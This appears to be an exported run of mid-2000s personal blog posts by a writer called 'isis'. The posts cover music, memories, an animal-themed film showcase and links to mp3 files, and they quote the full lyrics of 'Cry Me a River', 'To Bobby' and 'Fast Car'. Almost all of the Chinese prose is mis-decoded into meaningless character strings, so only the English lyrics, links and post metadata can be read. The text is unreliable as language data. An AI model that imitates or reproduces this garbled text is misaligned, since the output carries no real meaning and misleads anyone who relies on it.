/>ֱ¬Oֵ¦^₪F¨S¦³¦W¦r×÷©ַ׫¡C <br />©ַ׫¨ל«°³ש¸ּ¥h´M§ה₪@­׃¦n¦W¦r¡C <br /> <br />¡u¦p×G§ג§A×÷¦W¦rµ¹§×÷¸¡A§´Nֵ‎§Aֵ±j¡C¡v <br />¡y¦p×G§ג§×÷¯f×v¦n¡Aֵ‎§ֵ±j×÷¸¡A´N§ג¦W¦rµ¹§A¡C¡z <br /> <br />©ַ׫¶i¨ל₪F₪p¨k«ִ×÷¨­ֵי¸ּ¡C <br />₪p¨k«ִֵ±o«D±`°·±d ¡C <br />°ך₪‎«D±`°×¿³¡C <br /> <br />¡u₪‎₪l±d´_₪F¡I₪‎₪l±d´_₪F¡I¡v <br /> <br />©ַ׫«D±`³ֵw₪p¨k«ִ×÷¦W¦r¡C <br />₪]«³ֵw«°³ש¸ּ×÷¥ֽ¬¡¡A©ׂ¥H¨{₪lֱצµM¾j¡A«o§װ­@₪U¨׃₪F¡C <br />¨C₪ׁ¨C₪ׁ¡A¨{₪l¾j±o©BֲP©BֲP¥s¡Aֱ¬O§װ­@₪U¨׃₪F¡C <br />¦‎¬O¡A¦]¬°¨{₪l¹ך¦b₪׃¾j₪F¡C <br /> <br />¡u¬¬§¡A¬¬§¡A§¨­ֵי¸ּ×÷©ַ׫₪w¸g×ר×÷³o»ע₪j₪F¡C¡v <br /> <br />₪p¨k«ִ§ג°ך₪‎¡A₪j¦©M¹²₪H¥‏³¡³£¦Y±¼₪F¡C <br />¥d­ש¥d­ש¡A©B¼T©B¼T¡A¹ַ§s¹ַ§s¡A©B¹¡C <br /> <br />¦³₪@₪ׁ¡A₪p¨k«ִ¹J¨ל₪F©¹¦ט¨«×÷©ַ׫¡C <br /> <br />¡u§¦³¦W¦r₪F®@¡A₪@­׃«D±`¦nֵ¥×÷¦W¦r¡C¡v <br /> <br />©¹¦ט¨«×÷©ַ׫»¡₪F¡G <br />¡y§₪£»­n¦W¦r¡A§¨S¦³¦W¦r₪]¹L±o«©¯÷ײ¡C¡z <br />¡y¦]¬°§­ּ¥»¨׃´N¬O¨S¦³¦W¦r×÷©ַ׫¡C¡z <br /> <br />₪p¨k«ִ§ג©¹¦ט¨«×÷©ַ׫¦Y±¼₪F¡C <br />¦n₪£®e©צ₪~±o¨ל×÷¦W¦r¡A«o¨S¦³¥פ¦ף₪@­׃¥i¥H¥s¥L×÷₪H₪F¡C <br /> <br />¬ש¿«¡A³o­׃¦W¦r¦h»ע×÷¦nֵ¥¡C <br /></blockquote> <br /> <br /> <br /> <br />·Q°e Audrey Hepburn ×÷ <a href="http://isism.com/music/audrey_hepburn-moon_river.mp3" target="_blank">moon river</a> ¡]§₪@×½«D±`³ֵw¡^»P¡mMy Fair Lady¡n¸ּ×÷ <a href="http://isism.com/music/Audrey_hepburn-i_could_have_danced_all_night.mp3" target="_blank">I could have danced all night</a> µ¹³o¦ל×B₪ֽ¡C <br /> <br />¯¬³o¦ל×B₪ֽ©¯÷ײ¡A¦n₪£®e©צ₪~±o¨ל×÷¦W¦r¡A¯א¾ײ¦³³\¦h¥i¥H³³o¦W¦r×÷₪H¡C <br /> <br /> <br /> - http://www.upsaid.com/isis/index.php?action=viewcom&id=224 - isis - 2005-11-02T12:36:52+07:00 - 0 - - - ¡Cin-between - ¦n₪[×÷±q«e¡A¦³₪H³o»ע°§¡C¦p¦P®L¦t×÷¡q¼g÷q¡r¸ּ¼gµ×÷¡G <br /> <br />¡u§A×¾¹D¶¡H§A·¥¥i¯א¬O₪@­׃¦₪v₪@½ת₪l³£₪£·|µo²{×÷¦P©ֵ¡A§×÷¥t₪@­׃×B₪ֽ´¿¸g³o¼ֻ§i¶D§¡C¦o¬O₪k₪H¡A¦׃¥B¥u·R₪k₪H¡C§³]·Q¨ל¦U÷״±¡×p¡A§·¥¥i¯א¬O₪@­׃¦₪v₪@½ת₪l³£₪£·|µo²{×÷₪°»ע₪°»ע¡C§³Q¦U÷״¥i¯א©¿Eµo¡A²`²`³Q₪@¨ַ₪£´M±`×÷¿Eְy®נ×^©ֵׂ¢¸n¡C¡v[more...]§·¥¥i¯א¬O₪@­׃¦₪v₪@½ת₪l³£₪£·|µo²{×÷₪°»ע₪°»ע....©־×ּ½ײ¬O₪@­׃§O₪H₪@½ת₪l³£₪£·|µo²{×÷₪°»ע₪°»ע¡C <br /> <br />§²`²`¦a³Q₪@¨ַ₪£´M±`×÷®נ×^©ֵׂ¢¸n¡C <br /> <br />¨ג­׃₪כ¨׃ִ±±o₪‎µב×÷¡q¦p×G§A¬O°²×÷¡r÷qµ¯u¡u³r¡v¡C <br /> <br /> <br /> ¦p×G§A×÷¼ֻ₪lֵ¦¨¥v¥£₪ס <br /> ¬O§_¯d₪U₪@¼ֻ×÷¦^¾׀ <br /> <br /> ¡¯¦p×G§A¬O÷¿²ת <br /> ¬O¯²ת¬d²zֱ¬O¨ֱ¥»ְs₪@ <br /> ·|₪£·|¦³«₪j×÷ֳצ«Y <br /> <br /> <br />§A¬O₪£¬O¦₪v₪@½ת₪l³£₪£·|µo²{×÷₪°»ע₪°»ע¡H§A¬O₪£¬O¦₪v₪@½ת₪l³£×¾¹D×÷₪°»ע₪°»ע¡H¦p×G§A¬O°²×÷¡H¦p×G§A¬O¯u×÷¡H <br />¯u¬Oµo₪H²`¬×÷°ֳD¡C <br /> - http://www.upsaid.com/isis/index.php?action=viewcom&id=223 - isis - 2005-10-28T19:48:15+07:00 - 0 - - - ¡Cֱy - ¡u¥u¬O¨÷»ע·L·L×÷¡A¦n¹³ֱy¡A±q₪@ֳהֲא¨ל¥t₪@ֳה¡A¦o₪Hֱ¬O¨÷­׃₪H¡A©ׂ¦³×÷«÷¶ױ³£₪@¼ֻ¡A¦p×G¦]¬°³o¼ֻ×÷½t¬G¦o´N₪£¦A¬O¦o­ל¨׃×÷¡A¦o¥u¬O»¡¡A§A§ֻ¿ש₪F¡A§A»~·|₪F¡F¦o´N³o¼ֻ§¹¦¨¦o×÷¥X½ז¡C <br /> <br /><a href="http://www.upsaid.com/isis/index.php?action=viewcom&id=220" target="_blank">¨÷»ע»´·L©־³\®¥»´N₪£¦¨¬°₪@­׃«÷¶ױ¡C</a>[more...]±qֱy×÷³o₪@ֳה¨ל³o₪@ֳה¡A³o±iֱy³o·L·L×÷¥ת¡A¦b§ֱy×÷¥×ֳהµM«ב¦b§×÷ֱy×÷¥kֳה¡A§ֱ¬O¨÷­׃₪H¡A§©M§¹L¥h₪§¶¡¦³®ֹ¶¡¡A·ם§±q¹L¥h×÷®ֹ¶¡ֲק¶}¡A₪£¦]¬°³o¼ֻ×÷½t¬G§´N₪£¬O­ל¨׃×÷¡A¦p×G¦³³o¼ֻ×÷¿פִ±₪@©w¬O§§ֻ¿ש₪F¡A¬O§×÷₪ִ±¡A§»¡₪£·|×÷¡A₪£¬O×÷¡A³£§ֻ¿ש₪F¡A³£»~·|₪F¡F¨ל©³¬O§¥X½ז₪F¡Aֱ¬O¬ֶ»ע¥X½ז₪F§¡C <br /> <br />¬ֶ»ע¥X½ז₪F§¡C¬O®ֹ¶¡»ע¡C¬O¦r»ע¡C <br />¬O¦o¥X½ז₪F»ע¡C¦oֱ`¬O²ִ₪@­׃ֲק¶}¡C <br /> <br />ֲק¶}´N¬O·ם©ׂ¦³¥¼§¹¦¨₪§®ֹ¡C¹³²צ¥¾¯S×÷¡q¦w»מ¦±¡r¡C¡]§A¥ֳ»·µL×k§¹¦¨§A¦₪v×÷¦w»מ¦±¡C¡^¡]±¸¹׃×ּµL×k§¹¦¨¦o×÷±¸¹׃¡C¦p×G¦o§¹¦¨¡A¦o´N₪£·|¦¨¬°¦₪v×÷±¸¹׃×ּ¡C¦p×G¦o₪£§¹¦¨¡A¦o₪]₪£·|¦¨¬°¦₪v×÷±¸¹׃×ּ¡C¡^ <br /> <br />×ש¥´¶}¡A¦³¥t₪@«׳×ש¡C×ש¥´¶}¡A₪S¦³¥t₪@«׳×ש¡C×ש¸ּ­±¦A¦³×ש¡C×ש¥´¶}¡A´N·|¥´¶}¥t₪@«׳×ש×÷ֳצ₪W¡C·ם×ש¥´¶}×÷®ֹ­װ¡A₪]¦]¬°×ש¥´¶}¡A×שֳצ₪W¡C <br /> <br />§µL×k¦³§O×÷«÷¶ױ¡C¦o»¡¡C½׀­ל½ּ¡C§©ת¥ױ¡C§»¡¡C¦]¬°§©ת¥ױ¡A§₪£»¡¡C <br /> <br />¡v----¡m¨Hְq¡C·t°׳¡C·L₪p¡C¡n - http://www.upsaid.com/isis/index.php?action=viewcom&id=222 - isis - 2005-10-27T00:16:57+07:00 - 0 - - - ¡C«B©] - ₪­₪»¦~«e¡A¦³₪H´¿¸g»¡­n§i§¡C[more...]¨ה¹ך₪@³ץ²V¥M¡C <br /> <br />·ם®ֹ­n§ן÷פ­¶¡B§ן«H½c¸ך®ֶ¬O¥ף¦h»ע®e©צ×÷¨ֶ¡C <br /> <br />¦‎¹L₪F¨ג₪T¦~¡A§¦³¨ַ«ב®¬¡A¨÷₪]₪£¹L´N¬O­׃³Q§ט₪U₪פ₪S±i´­×÷₪H¡C¹ך¦bµL¶·¨÷»ע¹ן«¡CֱצµM¹ן₪ט×÷÷A«׳«¶ֻ₪H¡C <br /> <br /> <br />¦¹«ב§¶V¨׃¶Vµ½¨}₪F¡C«B©]₪S·Q°_₪F³o¨ַ¨ֶ¡C - http://www.upsaid.com/isis/index.php?action=viewcom&id=221 - isis - 2005-10-26T02:38:10+07:00 - 0 - - - ¡Ccry me a river - ¡u¨÷»ע»´·L©־³\®¥»´N₪£¦¨¬°₪@­׃«÷¶ױ¡C¡v <br /> <br />₪U₪F±¶¹B¡A₪@²´±ז¨£ֲֲֳׁ¡C <br />ֳh©ְ±q«e±r« Blue Note ×÷«÷¶ױ¡C·Q°_₪@­÷ְ³´÷×÷÷q¡C[more...]¥V₪ׁ¾A¦Xְן₪h¡C <br /> <br /> <br />Now you say you're lonely <br />You cry the whole night through <br />Well, you can cry me a river <br />Cry me a river <br />I cried a river over you <br /> <br />Now you say you're sorry <br />For being so untrue <br />Well, you can cry me a river <br />Cry me a river <br />I cried a river over you <br /> <br />You drove me... nearly drove me <br />Out of my head <br />While you never shed a tear <br /> <br /><a href="http://twblog.no-ip.info/isis/music/Julie_London-Cry_Me_A_River.mp3" target="_blank">Remember... I remember all that you said</a> <br />Told me love was too plebeian <br />Told me you were through with me <br /> <br />And now you say you love me <br />Well, just to prove you do <br />Come on and cry me a river <br />Cry me a river <br />I cried a river over you <br /> <br />I cried a river over you <br /> <br /> <br /> <br /> <br /> <br /> <br /> - http://www.upsaid.com/isis/index.php?action=viewcom&id=220 - isis - 2005-10-25T05:10:50+07:00 - 0 - - - ¡Cmarching in the streets with little victorias and big defeats - <a href="http://heterotopias.org/node/727" target="_blank">¦³₪H</a>´£°_§³\₪[₪§«e×÷<a href="http://www.upsaid.com/isis/index.php?action=viewcom&id=103" target="_blank">ְ¸כ¦</a>¡C[more...]±q¨S¥X²{¦b¼s§i¸ּ×÷ Bob Dylan ¦b Victoria's Secret ¼s§i¸ּ®¾°t¼ײ Love Sick ¸`«µ±¼´U₪l®ֹ¡A§·Q°_₪F Joan Baez ×÷ To Bobby¡C <br /> <br />©־³\§­ּ¹ן₪wµM¥¢¥h·R¯א°¯א×÷¦ׁ Bobby ¥u¯א¡A° Love Sick¡C <br /> <br /> <br />"To Bobby" <br /> <br />(Words and Music by Joan Baez) <br />I'll put flowers at your feet and I will sing to you so sweet <br />And hope my words will carry home to your heart <br />You left us marching on the road and said how heavy was the load <br />The years were young, the struggle barely had its start <br />Do you hear the voices in the night, Bobby? <br />They're crying for you <br />See the children in the morning light, Bobby <br />They're dying <br />No one could say it like you said it, we'd only try and just forget it <br />You stood alone upon the mountain till it was sinking <br />And in a frenzy we tried to reach you <br />With looks and letters we would beseech you <br />Never knowing what, where or how you were thinking <br />Do you hear the voices in the night, Bobby? <br />They're crying for you <br />See the children in the morning light, Bobby <br />They're dying <br />Perhaps the pictures in the Times could no longer be put in rhymes <br />When all the eyes of starving children are wide open <br />You cast aside the cursed crown and put your magic into a sound <br />That made me think your heart was aching or even broken <br />But if God hears my complaint He will forgive you <br />And so will I, with all respect, I'll just relive you <br />And likewise, you must understand these things we give you <br />Like these flowers at your door and scribbled notes about the war <br />We're only saying the time is short and there is work to do <br />And we're still marching in the streets with little victories and big defeats <br />But there is joy and there is hope and there's a place for you <br />And you have heard the voices in the night, Bobby <br />They're crying for you <br />See the children in the morning light, Bobby <br />They're dying - http://www.upsaid.com/isis/index.php?action=viewcom&id=219 - isis - 2005-10-21T23:37:39+07:00 - 2 - - - ¡CFast Car - ¥xֶW°ך»³ׂ₪u¨ף·|¯µ®ׁ×רֵU¥ֹ¬ֲ³ר¾ֹ¥~³ׂ×÷₪ו³¹¡m°k¡n±o₪F²ִ₪G₪Q₪K©¡®ֹ³ר₪ו¾ַ¼ת³ר¾ֹ₪ו¾ַ¼ת¡A<a href="http://ilyagram.org/archives/1683.html" target="_blank">¦³₪H</a>»¡°_₪@­÷÷q¡C <br />[more...]<a href="http://twblog.no-ip.info/isis/music/Tracy_Chapman-Fast_Car.mp3" target="_blank">Fast Car</a>¡A¦n¶m·T×÷÷q¡C <br /> <br />¨÷¬O°ך₪₪®ֹ­װ¡A₪p׫¼©ט©ד¥~±C®a×÷₪£°²£¡A¸ע¦a₪U¿ת²ר­ֹ¿ת¡A«e«ב´X¦¸¡A³׀·~¡B«ז¥־¡B¶}¶W°׃....¡C«ב¨׃¶ֵ¥D₪W×ש¡A¶W°׃¸ּ¯א·h×÷¥‏³Q·h¥ת₪F¡C¶‎¶‎±q³ׁ¾l×÷³f«~·ם₪₪§ה¨ל₪@®M₪T±i¡A¬£·ח°₪ש¥X×÷ 60 ~ 90 ¦~¥N¸¯µ¬¼ת±o¼ת÷q¦±¡A¦@₪­₪Q­÷¦X¶°¡C´N³o»ע¸¨¨ל₪F§₪ג₪W¡C <br /> <br />§°O±o¡AFast Car ©M The Way We Were¡BJust The Way You Are ¦P¦bµµ¦ג¨÷₪שCD¸ּ¡AFast Car ¬O²ִ₪Q₪­­÷¡C <br /> <br />°O±o¡A¬O¦]¬°±q₪p¨S₪°»ע¦h¾l×÷׫¨ֶ¯א°ק±a§°kֲק¡C¥|·³§¦³¥b¥»°׳¶ְ×÷¡A¥u¦³«e¥|₪Q¦^×÷₪ו¨¥¬ץ¼׃¹¡A₪÷­¶¦³³\¦h¦ח³½­¹₪F×÷×ֵ¬}¡A¦r¦r±ז²´±‎¬ן¡C₪­₪»·³¦³¶‎¶‎¼צ₪₪×÷₪₪ֲו®ִׁy¡C₪@®M₪»₪Q¥»×÷¥ֽ׫₪p¦¬ל¯א¬₪W¨ג¦¦h¹M¡C <br /> <br />°ך₪p¡A¥u¯א°k©¹¦חֳo»P¬~₪ג¶¡¡C°ך₪₪°k¦V¦­ֵ¡Bֵי¨|³ץ¡B¬ן¶V¿₪¥«×÷³ז¨®®ָµ{....¶VֳM¶V§ײ¡A¶V§ײ¡A¶V§ײ¡C <br /> <br />°×₪₪¡A¶ְ×ק®©₪צt§O₪H×÷¼¯©ל¨®¡Cֳ½ֳׂ®a¡A¦b¦¨₪j°µ¬ל®i°­²V¡C«O°e¥x₪j¨÷­׃¬K₪ׁ₪W₪F¥x¥_¡A®L₪ׁ¦n×B₪ֽ´ֵ·N¥~¨­¬G¡C§¦A₪]₪£צt¨®₪F¡A¬ֶ¦§ׁ₪F¦p¦ףֳM¨®¡A§ׁ₪F©ׂ¦³»P´ֵ¦³ֳצ×÷₪H¨ֶ׫¡C <br /> <br />¶}©l¬O©«I®`¡B¦p×־¨m¼@×÷®a±......¡A±µµ¬O₪@³s¦ךֱ¶ֵ¡B­p½a¡B¬d«¡B¯}²£......¡C <br /> <br />÷¸«ב×÷´X¦~§²׳©ףֲ¼₪F³ּ₪j×÷₪@°ף½ׂ¡C¶i¥Xֲו°|¡A¿ע§ׁ³\¦h³\¦h¡Aֱ­n§ף¦h¡C <br /> <br />¦p×G°k₪£₪F¡A°¦³§ֳׁh¡C¥i§ֱ°O±o³o­÷÷q¡C <br /> <br /> <br />"Fast Car" <br /> <br />You got a fast car <br />I want a ticket to anywhere <br />Maybe we can make a deal <br />Maybe together we can get somewhere <br />Anyplace is better <br />Starting from zero got nothing to lose <br />Maybe we'll make something <br />Me myself I got nothing to prove <br /> <br />You got a fast car <br />I got a plan to get us out of here <br />I been working at the convenience store <br />Managed to save just a little bit of money <br />We won't have to drive too far <br />Just across the border and into the city <br />You and I could both get jobs <br />Finally see what it means to be living <br /> <br />See my old man's got a problem <br />Lives with a bottle that's the way it is <br />He says his body's too old for working <br />Body's too young for looking like his <br />Mama went off and left him <br />Wanted more from life than he could give <br />I said somebody's got to take care of him <br />I quit school that's what I did <br />What I did, what I did <br /> <br />You got a fast car <br />Is it fast enough that we can fly away <br />We gotta make a decision <br />Leave tonight or live and die this way <br /> <br />So remember when we're driving, driving in your car <br />The speed so fast felt like I was drunk <br />City lights lay out before us <br />And your arm felt nice wrapped 'round my shoulder <br />And I had a feeling that I belonged <br />And I had a feeling I could be someone, be someone, be someone <br /> <br />You got a fast car <br />We go cruising, entertain ourselves <br />You still ain't got a job <br />And I work in a market in the checkout line <br />I know things will get better <br />You'll find work and I'll get promoted <br />We'll move out of the shelter <br />Buy a big house and live in the suburbs <br /> <br />So remember when we're driving, driving in your car <br />The speed so fast felt like I was drunk <br />City lights lay out before us <br />And your arm felt nice wrapped 'round my shoulder <br />And I had a feeling that I belonged <br />And I had a feeling I could be someone, be someone, be someone <br /> <br />You got a fast car <br />I got a job pays all our bills <br />Stay out drinking late at the bar <br />See more of your friends than you do of your kids <br />I'd always hoped for better <br />Thought we'd together you and me would find it <br />I got no plans I ain't going nowhere <br />Take your fast car and keep on driving <br /> <br />You got a fast car <br />Is it fast enough so you can fly away <br />You gotta make a decision <br />Leave tonight or live and die this way <br /> <br />So remember when we're driving, driving in your car <br />The speed so fast felt like I was drunk <br />City lights lay out before us <br />And your arm felt nice wrapped 'round my shoulder <br />And I had a feeling that I belonged <br />And I had a feeling I could be someone, be someone, be someone <br /> <br /> <br />ֵ¥§¹ Fast Car¡A±µµֵ¥ <a href="http://twblog.no-ip.info/isis/music/The_Smiths-Heaven_Knows_I'm_Miserable_Now.mp3" target="_blank">The Smiths ×÷ Heaven Knows I'm Miserable Now</a> ¶¡H¹ךµM¡Aְ³µM¡A©־µM¡H <br /> <br /> - http://www.upsaid.com/isis/index.php?action=viewcom&id=218 - isis - 2005-10-21T23:20:58+07:00 - 2 - - - ¡C¡u§­ּ»­n₪@÷״¥]¬A°×«¦b₪÷×÷µLֳה¬ֹ×÷¹D¼w¡v----²ִ₪@©¡°×«¼v®i¼v₪שµ₪¶ - ¡u§­ּ»­n₪@÷״¥]¬A°×«¦b₪÷×÷µLֳה¬ֹ×÷¹D¼w¡v <br />----²ִ₪@©¡°×«¼v®i¼v₪שµ₪¶ <br /> <br />ֲא¸¦<a href="http://www.pots.com.tw" target="_blank">¯}¶g³ר</a>´_¥Z 382 ´ֱ <br /> <br /> <br />₪ו / ±d¹חִֹ <br /> <br /> <br />₪°»ע¼ֻ×÷¼v₪ש·|¨ֿ₪H¹ן₪Hֳ‏¦³¨ַ¡u¦¥H¬°¬O¾ֹ­P¡y₪ו©ת¡z¹L«׳¡v×÷·P¶ֻ¡H₪°»ע¼ֻ×÷¼v₪ש¯א«P¶i§ף¦h₪H¹ן°×«¥@¬ֹ×÷²z¸ׁ»P´L­«¡H <br /> <br />²`¨ד·N¸q×÷²ִ₪@©¡°×«¼v®i¡A¥Hֳצ©ף°×«¡]¥]¬A₪Hֳ‏¡^×÷21³¡₪ש¡A§ֶ±ז³z¹Lֶ[¼v¡B®y½ֽ»P¨ה¥L¦ז°¡A±a°§ף¦h₪H₪ֿ«ה₪Hֳ‏»P¨ה¥L¡u«D₪Hֳ‏°×«¡v÷״÷״₪¬°×÷ֳצ«Y₪־¼vֵT¡C°×«¼v®i₪]¬O­׃¨ֿ₪H«ה¦ׂ¡u¬¨£¡v»P¡u¬₪£¨£¡v×÷¦n¾ק·|¡C­±¦V¼v₪ש¸ּ¦A²{×÷°×«¡A₪Hֳ‏¹ן«°×«×÷´»ֵ»P₪£¸q®ֹ±`¬LµM­Y´¦¡C¨C­׃₪H²׳¨s±o°¦₪v¡A§A¦p¦ף¡u¬¨£¡v¡A¦ף¥H¡u¬₪£¨£¡v¡A°¦₪v¬¨£₪F₪§«בִ@·N°µ₪°»ע¡A©¹«ב­±¹ן¬ֳצ°ֳD®ֹ¦p¦ף₪ְֿ³¡H¦]¬°¡A₪ֿ«ה«ב¡A¦ז°¡A₪~¦³·N¸q¡C <br /> <br />«ך¬O¯א°ק±ז¶i¼v₪ש¹ץ«e¹ץ«ב©|₪£¨¬³B¡A©ף°×««Oֵ@»P°×«÷ײ§Q²z©ְ₪§±ְ¼s₪~¦³¶i¨B×ֵ¶¡¡A§­ּ¬ֳ±₪¦U¼v₪ש©חִב₪u§@×ּ¹L¥h§V₪O¦¨×G¡A₪]¬ֳ±₪₪ֿ«ה₪§«ב¥¼¨׃°ע¶i×÷¥i¯א¡Cµ₪¶¥H°«O¬°¶b¡A©װֲXֱa²`¡A­Y¬O­V³d¡A¥ח¬°´ֱ³\¡C[more...]¡³§ג×בִmµ¹×¯ <br /> <br /><img src="http://www.east.org.tw/animal-movie/images/movies/11.jpg"> <br /> <br />₪ש¦W¡G¡m§ג×בִmµ¹×¯¡n <br />¾ֹ÷t¡Gֵַ¥ֹ¬ֲ <br />°µeµu₪ש¡G5₪ְֱִ¡]´¶¹M¯ֵ¡^ <br /> <br />¥»₪ש¥H׫ֵי°µe§־¦¡×ם²{¦p÷P¯ָ¯כ¯®z×÷¬y®צׯ¡A¦b₪£©צ¦^¦¬¥B®ר·ְ§xֳר×÷¹x±jµL¾ק¶ל½¦₪Hֳ‏«°¥«¸ּ×÷¥ֽ¬¡¡A¥H₪־₪£·ם®·®»¬Fµ¦₪U¾D¨×÷¹ן«¡C¥H¯ָ₪ֶ¦¨×¯×÷§־ֵי¡A¥H¶ל½¦»s×÷¥ֽ¬¡¥־¨ד¡]©U§£±ם¡Bµ§µ©¡B¦¬¯ַ²°¡B°£₪ע₪M¡B¹q½u¦¬¯ַ¾¹µ¥µ¥¡^¬°§G´÷¶H¼x¬Y÷״¡u₪H³y³£¥«₪ו©ת¡v¡A®i²{¹ן₪סֳצ«Y¡C«°¥«©~₪j₪£©צ¡A¯ָׯ°£₪F¦b₪H³y«°¥«¸ּ§¢©V¥~¡A³Q®·®»«ב×÷¹ׂ¹J§ף¥O₪H´l°¡C»R¥x׫¥ף©U§£±םֱפ³כׯ§@¬°₪@­׃¥ֽ©R¡A¦b₪H³y«°¥«¸ּ«oֱ`³Qµר¬°ֵ¼¶ֳ©U§£¡Aµר¬°¡u¥L×ּ¡v¡A¦׃±‎°£₪§«ב§ײ¡C¦p×G÷P¯ָ¦³¥ֽ©R×÷¸¡A²{¹ך¬O₪°»ע¼ֻ₪l©O¡H¥»₪ש₪ש¥½₪¥־¡m¥xֶW°×«₪§ֱn¡n¡B¡m₪¼¡n¦b1998¦~¥xֶW°«O×k©|¥¼₪Tֵ׳q¹L«e¡A©ף¥xֶW¦U¡u₪½¥¡v¦¬®e©ׂ©חִב×÷·׃₪ש¡C²{¹ך¬O¡G¦b³£¥«¸ּ«s«sµL§i×÷²´¯«¡B·ם¦~¬Y¨ַ¦¬®e©ׂ¥H¹qְ»³B¨M₪°¦«ב¾l©ףֵ¢₪₪×÷¨ג±רµJ¶ֲ´×ֿ¡B¨S¦³­¹×«¡B₪פ¡A₪°¦₪¬¬°­¹¾מ«ֽ¹M³¥......¶ֲ¥ױ·׃₪שְRְqµL»y¡Aµe­±¨ֲֲֵּf°׳´d÷G¦a¶D»¡²I¦ו¹L©¹¡A₪ש§ְ¥H₪@¦·÷P¯ָ₪j¬ץ×ב±¥©ְ¨÷¨ַ³Q₪Hֳ‏³ּ₪£©¾¹ך¹ן«×÷₪Hֳ‏³ּ©¾¹ך×÷×B₪ֽ¡C <br /> <br /> <br /> <br />¡³¥ײ₪W¯ף ¡]Skin, Grass and Fur¡^¡]´¶¹M¯ֵ¡^ <br /> <br /><img src="http://www.east.org.tw/animal-movie/images/movies/03-2.jpg"> <br /> <br />₪ש¦W¡G¡m¥ײ₪W¯ף¡n <br />¾ֹ÷t¡Gֵַ¥ֹ¬ֲ <br />°µeµu₪ש¡G5₪ְֱִ¡]´¶¹M¯ֵ¡^ <br /> <br />¥»₪ש»P2004¦~28©¡×k°ך¦w¿°µe¼v®i¡A³ּ¨־¾ַ°|»P²¦·~§@«~°µeµu₪ש¡m¥ײ¯ף׫»y¡]Allerleirauh / Whisper of the Fur-cone <br />¡^¡nµL¿W¦³°¸¦a§¡₪¥־₪F®ז×Lµ£¸¸ּ×÷¡q₪d¥ײֳ~¡]Allerleirauh¡^¡r¬G¨ֶ¡C¼w°ך¾ֹ÷t Anja Struck ×÷¡m¥ײ¯ף׫»y¡nֳצ©ף­h«»P¼ֹ₪O¡Fֵַ¥ֹ¬ֲ×÷¡m¥ײ₪W¯ף¡n«h¨ת¡u¥ײ¯ף¡v₪G¦r₪₪₪ו¦r¸q¡A³z¹L÷K¨תµ£¸¬G¨ֶ₪ש¬q¡A±N¥ײ¡B₪ע¡B©¡B»P¦µM³sµ²¡A¥ר¹ֿ±´°Q₪k©¦b₪קֵvµ²÷c₪U¡A»P°×«¦b₪Hֳ‏±j¶ױ₪ה°t₪U×÷¥ז₪¬³sµ²¡B®_¨מֳצ«Y¡C₪½¥D¸תֱ׳₪ק₪‎¹G±B°k₪J¾נ×L¸ּ¡A¦¹₪@µ£¸₪₪×÷ֲא§י¦b¥»₪ש¡A«h¬נ₪J¨p³B±K×L¡Aֱצµy¶±גְ¡Aµu₪ש₪£¨¬©׃¸¡A«o₪£¥¢¬°₪@­׃±׃¾U×÷³sµ²¡C <br /> <br />¡q₪d¥ײֳ~¡rµ£¸¸ּ₪½¥D¬°°kֱ׳₪ק₪‎¶ֳ­¡A¨ֻ÷µ×ְ³₪ק₪‎¨D±B±o­nֲ§×«¡A¥X₪FֳרֳD¡G­n¨D₪T¥ףµ״×A¡]¦U¦³¦p₪׃¶§¯כ×ק¶ְ¡B₪כ«G¯כ»ָ«G»P¬P¬P¯כִ£²´¡^¡Aֱ¦³₪@¥ף¦³µ°ך₪g¹ׂ₪÷©ׂ¦³°×«¥ײ₪ע»s¦¨×÷₪ז½´¡C¥»¥H¬°ֲ§×«­n¨D₪§°×ֳר¥H¹F¦¨×÷₪½¥D¦b±µ¨₪F³o´X¼ֻ׫¨ֶ«ב¡A¥u¦n÷N¶ֲ±aµֲ§×«»P₪T¼ֻ¶ְ×ק¯]ִ_¡A©₪W₪d¥ײ₪ע₪ז½´¡A©¶ֲ₪ג¨¬»Pֱy¡A°°¸ֻ¦¨₪d¥ײֳ~¡]₪ס³כ³ּ¦h³ֲּר½ס¥j©ַ×÷°×«©¶°¦X¡^°k¥X¬׃®c¡A¶i₪J´ֻ×L¡A¨ֳ¦÷¬O­׃³Q₪ק¥ְ©±ף×÷¥i¼¦₪k«ִ¡Aֵ‎¥t₪@­׃°ך₪‎»P®c¹²§ג¹ן¡u¥L×ּ¡v»P¡uֳ~©¡v×÷®£ִ»P¹½´c§כ®g¨ל¦₪v¡]₪k©¡^¨­₪W¡C¦]¦¹¡A¦b¬G¨ֶ¸ּ¡A¬ִR×÷₪½¥D°°¸ֻ¦¨×÷₪d¥ײֳ~₪k«ִ¥u¯א¦b¼p©׀´d÷G¦a₪u§@¡B÷־¦bֳ~¥¸ּ¡A¨­₪W×÷°×«¥ײ₪ע₪]¶H¼x₪F´¿fֱפֲֳ¡B¼₪±ז»P¯«¯µ°×«©¡A¸²§¦³½ל¦a«¯A₪F¬ן¥ײ¯ף©־³\¬O÷״₪Hֳ‏°kֱ׳®i²{¯u¹ך¦§¡A¥H₪־¹ן¥~¦b¥@¬ֹ₪£«H¥פ×÷¦ז¬°¡C¡m¥ײ₪W¯ף¡n¸ּ×÷¨p³B±K×L«ך«ך₪]¶H¼x₪F₪Hֳ‏¨­₪W×÷ֱפ½×¡B¼₪±ז»P°×«©¡A¥»₪ש«ב¥b³z¹L­י₪U₪k©¨p³B¥ײ₪ע¥H¬°°²¾v×÷°µeµe­±¡A°t¦X₪H₪u¹}¾i₪ע¥ײ°×«³Q­י¥ײ«ב×÷¯u¹ך÷G׬¹ֿ₪ש¡A¨ֶֿ[×ּ©גֲק₪F₪@¯כµLµר©ף«D₪H°×«µh­W×÷₪Hֳ‏₪₪₪₪÷A¡A©ת¥ױ³o÷״±q¥L×ּ¨­₪W¨ת±o¥ײ₪ע×÷¦ז¬°¥¿₪]¬O₪@÷״­י«d»P´»ֵ¡C <br /> <br 